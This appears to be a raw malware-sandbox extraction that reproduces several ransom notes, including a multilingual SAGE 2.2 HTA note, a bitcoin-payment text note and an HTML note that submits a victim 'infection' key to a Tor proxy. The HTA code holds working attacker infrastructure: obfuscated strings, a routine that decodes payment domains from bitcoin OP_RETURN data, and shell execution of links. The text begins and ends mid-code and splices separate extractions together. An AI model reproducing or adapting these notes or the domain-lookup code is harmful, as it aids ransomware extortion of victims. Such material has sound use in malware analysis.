if(err != null) return cb(err);
var json;
try{
if(window.JSON && window.JSON.parse){
json = window.JSON.parse(res);
}
else{
json = eval('('+res+')');
}
}
catch(e){
cb(e);
}
cb(null, json);
});
}
function getDomains(ad, cb){
eachUntil(sources, function(s, cb){
var url = 'http://'+s.bp;
url+= s.adp+ad;
if(s.adpb) url+= s.adpb;
getJson(url, function(err, json){
if(err != null) return cb(err);
try{
cb(null, s.ptxs(json));
}
catch(e){
cb(e);
}
});
}, function(err, txs){
if(err != null) return cb(err);
if(txs.length == 0) return cb('f');
eachUntil(txs, function(tx, cb){
eachUntil(sources, function(s, cb){
var url = 'http://'+s.bp+s.txp+tx;
getJson(url, function(err, json){
if(err != null) return cb(err);
try{
cb(null, s.ptx(json));
}
catch(e){
cb(e);
}
});
}, function(err, res){
if(err != null) return cb(err);
if(res == null) return cb('f');
cb(null, res.split(':'));
});
}, cb);
});
}
function updateLinks(){
tweakClass('lu', hide);
tweakClass('lu-updating', show);
getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){
tweakClass('lu', hide);
if(err != null){
tweakClass('lu-error', show);
return;
}
tweakClass('lu-done', show);
var html = '';
for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/Acyg4l6BhvWLA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>';
tweakClass('links', function(el){
el.innerHTML = html;
});
});
return false;
}
function onPageLoaded(){
try{
tweakClass('lsb', show);
}catch(e){}
try{
tweakClass('lu-orig', show);
}catch(e){}
try{
setLang('en');
}catch(e){}
try{
var args = GetCmd().match(/"[^"]+"|[^ ]+/g);
if(args.length > 1){
var file = args[args.length-1];
if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2);
document.getElementById('filename').innerHTML = file;
show(document.getElementById('file'));
document.title = 'File is encrypted';
}
}catch(e){}
}
</script>
</head>
<body onload='javascript:onPageLoaded()'>
<div class='lsb'>
<span class='ls ls-en' onclick="javascript:return setLang('en')">English</span>
<span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span>
<span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span>
<span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span>
<span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span>
<span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span>
<span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span>
<span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span>
<span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span>
<span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span>
<span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span>
</div>
<div id='file' class='container filecontainer'>
<div class='filename'>
<div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div>
<div>
<h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2>
<p><span id='filename'></span></p>
</div>
</div>
<h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-ar' > الملف الذي كنت بصدد فتحه وبعض الملفات المهمة على حاسوبك تم تشفيرها "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که شما تلاش کردید بازکنید و فایل های کامپیوتر شما رمزگذاری شده است "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2>
<h2 class='l l-en' style='display:block'>Action required to restore your files.</h2><h2 class='l l-de' >Aktion erforderlich, um ihre Daten wiederherzustellen.</h2><h2 class='l l-it' >Azione necessaria per ripristinare i file.</h2><h2 class='l l-pt' >O que você deve fazer para restaurar seus arquivos.</h2><h2 class='l l-es' >Se requiere una acción para restaurar sus archivos.</h2><h2 class='l l-fr' >Action requise pour restaurer vos fichiers.</h2><h2 class='l l-kr' >파일을 복원하는 데 필요한 작업.</h2><h2 class='l l-nl' >Aktie vereist om je bestanden te herstellen.</h2><h2 class='l l-ar' > الإجراءات المطلوبة لاستعادة الملفات الخاصة بك.</h2><h2 class='l l-fa' >برای بازگرداندن فایل های خود را اقدام کنید.</h2><h2 class='l l-zh' >要恢复文件需要进行解密。</h2>
</div>
<div class='container'>
<div class="text l l-en" style='display:block'>
<h1>File recovery instructions</h2>
<p>You probably noticed that you can not open your files and that some software stopped working correctly.</p>
<p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p>
<p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p>
<p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p>
<div class='info'>
<p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p>
</div>
<p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p>
<div class='keys links'>
<div class='key'>
<a href="http://7gie6ffnk
URLs
http://'+s.bp
http://'+s.bp+s.txp+tx
Extracted
Path
C:\Program Files (x86)\Adobe\Reader 9.0\Esl\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
Ransom Note
__________________________________________________________________________________________________
| |
| *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** |
|__________________________________________________________________________________________________|
Your files are now encrypted!
-----BEGIN PERSONAL IDENTIFIER-----
+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1O
UZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeI
KZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6
VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC
8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA
-----END PERSONAL IDENTIFIER-----
Your important documents, databases, documents, network folders are encrypted for your PC security problems.
No data from your computer has been stolen or deleted.
Follow the instructions to restore the files.
How to get the automatic decryptor:
1) Contact us by e-mail: [email protected]. In the letter, indicate your personal identifier (look at the beginning of this document)
and the external ip-address of the computer on which the encrypted files are located.
2) After answering your request, our operator will give you further instructions that will show what to do next (the answer you will receive as soon as possible)
** Second email address [email protected]
Free decryption as guarantee!
Before paying you can send us up to 3 files for free decryption.
The total size of files must be less than 5Mb (non archived), and files should not contain
valuable information (databases, backups, large excel sheets, etc.).
__________________________________________________________________________________________________
| |
| How to obtain Bitcoins? |
| |
| * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click |
| 'Buy bitcoins', and select the seller by payment method and price: |
| https://localbitcoins.com/buy_bitcoins |
| * Also you can find other places to buy Bitcoins and beginners guide here: |
| http://www.coindesk.com/information/how-can-i-buy-bitcoins |
| |
|__________________________________________________________________________________________________|
__________________________________________________________________________________________________
| |
| Attention! |
| |
| * Do not rename encrypted files. |
| * Do not try to decrypt your data using third party software, it may cause permanent data loss. |
| * Decryption of your files with the help of third parties may cause increased price |
| (they add their fee to our) or you can become a victim of a scam. |
| |
|__________________________________________________________________________________________________|
Extracted
Path
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\[HOW_TO_DECRYPT_FILES].html
Ransom Note
<html>
<head>
<title>How can I recover my files?</title>
<style>
html, body {
font-family: lucida sans,tahoma,aerial,serif;
font-size: 14px;
overflow-x: hidden;
background-color: #fff;
padding-left: 1rem;
}
div.box {
border: 1px dotted #212121;
padding: 0.4rem;
display: block;
margin-top: 0.5rem;
margin-bottom: 0.5rem;
}
input[type=submit] {
border: none;
padding: 0.1rem 0.7rem 0.1rem 0.7rem;
background-color: #303f9f;
color: #fff;
}
input[type=submit]:hover {
background-color: #212121;
}
a {
color: #212121;
text-decoration: none;
font-weight: bold;
}
a:hover {
color: #3f51b5;
text-decoration: underline;
}
</style>
</head>
<body onload="submit_form()">
<div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;">
<h3>What happened to my files?</h3>
<p>
All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>.
</p>
<h3>What does this mean?</h3>
<p>
This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them.
</p>
<h3>Is it possible to recover my files?</h3>
<p>
Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them.
</p>
<h3>How can I get the decryptor and the private key?</h3>
<p>
First, you'll need to synchronize your computer with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below.
<span style="display: block; font-size: 0.8rem;">*This file contains information to identify your computer and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span>
</p>
<p>
After you've synchronized your computer with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files.
</p>
<div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;">
<form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST">
<input type="hidden" name="infection" value="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">
<noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript>
<input type="submit" value="Upload the KEY file">
</form>
</div>
<div class="box">
<p>
Instructions to install Tor Browser (recommended).
</p>
<hr>
<ol>
<li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li>
<li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li>
<li>Then simply open the folder and click on "Start Tor Browser".</li>
<li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/NNYJZAHP_BA887275DA208E5B6522DF69/</span></li>
</ol>
</div>
<div class="box">
<p style="text-align: center; color: red;">
Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment.
WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible.
</p>
<ol>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li>
<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/">http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li>
<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/">https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275DA208E5B6522DF69/</a></li>
</ol>
</div>
</div>
</body>
<script>
function submit_form() {
if (confirm('Do you want to synchronize your computer now?')) {
document.infection_form.submit();
}
}
</script>
</html>
Extracted
Path
C:\ProgramData\Adobe\Updater6\!HELP_SOS.hta
Ransom Note
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Decryption Instructions</title>
<HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize">
<style>
a {
color: #04a;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
body {
background-color: #e7e7e7;
color: #222;
font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif;
font-size: 12pt;
line-height: 16pt;
}
body, h1 {
margin: 0;
padding: 0;
}
h1 {
color: #555;
text-align: center;
padding-bottom: 1.5em;
line-height: 1.2;
}
h2 {
color: #555;
text-align: center;
line-height: 1.2;
}
ol li {
padding-bottom: 13pt;
}
.container {
background-color: #EEE;
border: 2pt solid #C7C7C7;
margin: 3%;
min-width: 600px;
padding: 5% 10%;
color: #444;
}
.filecontainer{
padding: 5% 10%;
display: none;
}
.header {
border-bottom: 2pt solid #c7c7c7;
padding-bottom: 5%;
}
.hr {
background: #bda;
display: block;
height: 2pt;
margin-top: 1.5%;
margin-bottom: 1.5%;
overflow: hidden;
width: 100%;
}
.key{
background-color: #A1D490;
border: 1px solid #506A48;
display: block;
text-align: center;
margin: 0.5em 0;
padding: 1em 1.5em;
word-wrap: break-word;
}
.keys{
margin: 3em 0;
}
.filename{
border: 3px solid #AAA;
display: block;
text-align: center;
margin: 0.5em 0em;
padding: 1em 1.5em;
background-color: #DCC;
}
.us{
text-decoration: strong;
color: #333;
}
.info{
background-color: #E4E4E4;
padding: 0.5em 3em;
margin: 1em 0;
}
.text{
text-align: justify;
}
#file{
background-color: #FCC;
}
.lsb{
display: none;
margin: 3%;
text-align: center;
}
.ls{
border: 1px solid #888;
border-radius: 3px;
padding: 0 0.5em;
margin: 0.2em 0.1em;
line-height: 2em;
display: inline-block;
}
.ls:hover{
background-color: #D0D0D0;
}
.l{
display:none;
}
.lu{
display:none;
}
</style>
<script language="vbscript">
Function GetCmd
GetCmd = App.commandLine
End Function
</script>
<script language="javascript">
function openlink(url){
new ActiveXObject("WScript.Shell").Run(url);
return false;
}
function aIndexOf(arr, v){
for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i;
return -1;
}
function tweakClass(cl, f){
var els;
if(document.getElementByClassName != null){
els = document.getElementsByClassName(cl);
}
else{
els = [];
var tmp = document.getElementsByTagName('*');
for (var i = 0; i < tmp.length; i++){
var c = tmp[i].className;
if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]);
}
}
for(var i = 0; i < els.length; i++) f(els[i]);
}
function show(el){ el.style.display = 'block'; }
function hide(el){ el.style.display = 'none'; }
var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"];
function setLang(lang){
if(aIndexOf(langs, lang) == -1) lang = langs[0];
for(var i = 0; i < langs.length; i++){
var clang = langs[i];
tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; });
tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; });
}
}
function newXHR() {
if (window.XMLHttpRequest) return new window.XMLHttpRequest;
try {
return new ActiveXObject("MSXML2.XMLHTTP.3.0");
}
catch(error) {
return null;
}
}
function getPage(url, cb) {
try{
var xhr = newXHR();
if(!xhr) return cb('no xhr');
xhr.onreadystatechange = function() {
if(xhr.readyState != 4) return;
if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status)
cb(null, xhr.responseText);
};
xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true);
xhr.send();
}
catch(e){
cb(e);
}
}
function decodeTxString(hex){
var m = '0123456789abcdef';
var s = '';
var c = 0xAA;
hex = hex.toLowerCase();
for(var i = 0; i < hex.length; i+=2){
var a = m.indexOf(hex.charAt(i));
var b = m.indexOf(hex.charAt(i+1));
if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b;
s+= String.fromCharCode(c = (c ^ ((a << 4) | b)));
}
return s;
}
var OR = 'OP_RE'+'TURN ';
var sources = [
{bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/',
ptxs: function(json){
if(json.status != 'success') return null;
var res = [];
for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx);
return res;
},
ptx: function(json){
if(json.status != 'success') return null;
var os = json.data.vouts;
for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10));
return null;
}
},
{bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/',
ptxs: function(json){
if(json.status != 'success') return null;
var res = [];
for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid);
return res;
},
ptx: function(json){
if(json.status != 'success') return null;
